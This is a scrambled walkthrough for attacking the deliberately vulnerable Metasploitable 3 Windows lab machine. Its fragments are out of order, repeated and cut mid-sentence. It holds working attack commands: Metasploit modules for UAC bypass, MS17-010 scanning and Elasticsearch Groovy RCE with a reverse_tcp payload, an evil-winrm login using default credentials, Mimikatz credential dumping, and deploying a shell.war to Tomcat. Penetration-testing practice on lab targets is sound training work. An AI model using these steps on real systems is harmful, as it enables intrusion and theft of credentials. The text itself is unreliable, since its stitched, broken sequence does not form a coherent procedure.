Sometimes the simplest attack vector is the most effective. Windows Server 2008 R2 includes WinRM on port 5985, and Metasploitable 3 ships with default credentials that grant immediate access.
use exploit/windows/local/bypassuac_dotnet_profiler set SESSION exploit Use code with caution. 5. Post-Exploitation and Flag Retrieval
Metasploitable 3 comes with multiple user accounts, including interesting names referencing Star Wars characters.
: Use the auxiliary module auxiliary/scanner/smb/smb_ms17_010 to see if the target is vulnerable.
Remote code execution via legacy script injection vulnerabilities. Phase 2: Initial Access & Exploitation metasploitable 3 windows walkthrough
If credentials match, spawn a remote shell using evil-winrm : evil-winrm -i 10.0.2.15 -u vagrant -p vagrant Use code with caution. 5. Post-Exploitation and Privilege Escalation
Once initial access is secured, the next goal is upgrading permissions to NT AUTHORITY\SYSTEM . Local Information Gathering
From an elevated Meterpreter session, load the Kiwi (Mimikatz) extension to dump plaintext credentials and NTLM hashes from memory: load kiwi creds_all Use code with caution.
Gaining initial access is often just the beginning. If your session is running as a low-privileged user (like tomcat or localadmin ), you must escalate privileges to NT AUTHORITY\SYSTEM . Local Information Gathering Run basic environment checks inside your initial shell: whoami /priv systeminfo wmic product get name,version Use code with caution. 1. Exploiting AlwaysInstallElevated Sometimes the simplest attack vector is the most effective
Or manually upload and run JuicyPotato.exe .
set RHOSTS TARGET_IP set RPORT 9200 set TARGET 1 # Windows Target set PAYLOAD windows/meterpreter/reverse_tcp set LHOST YOUR_IP set LPORT 4445 Use code with caution.
Run git clone https://github.com in your terminal. Navigate to the Directory: cd metasploitable3
If you want to focus on without Metasploit Share public link upload your shell.war file
If you want to build a custom image from source, use:
: In the Tomcat Manager dashboard, scroll down to WAR file to deploy , upload your shell.war file, and click Deploy .
The Windows version of Metasploitable 3 is frequently breached through its web application stack. One of the most classic entry points is the Unauthenticated Access: Often, the Jenkins Script Console is left unprotected. Remote Code Execution (RCE): Since Jenkins runs as a high-privileged service (often
Metasploitable 3 Windows runs an outdated version of Elasticsearch vulnerable to Remote Code Execution (RCE) via CVE-2015-1427. This vulnerability allows attackers to bypass sandbox restrictions using Groovy scripts. Exploitation via Metasploit: Initialize the Metasploit Framework: msfconsole Search for the module: search elasticsearch_groovy
Host-Only or NAT Network. Verify both VMs can ping each other but are isolated from your local production network. 2. Phase 1: Information Gathering and Scanning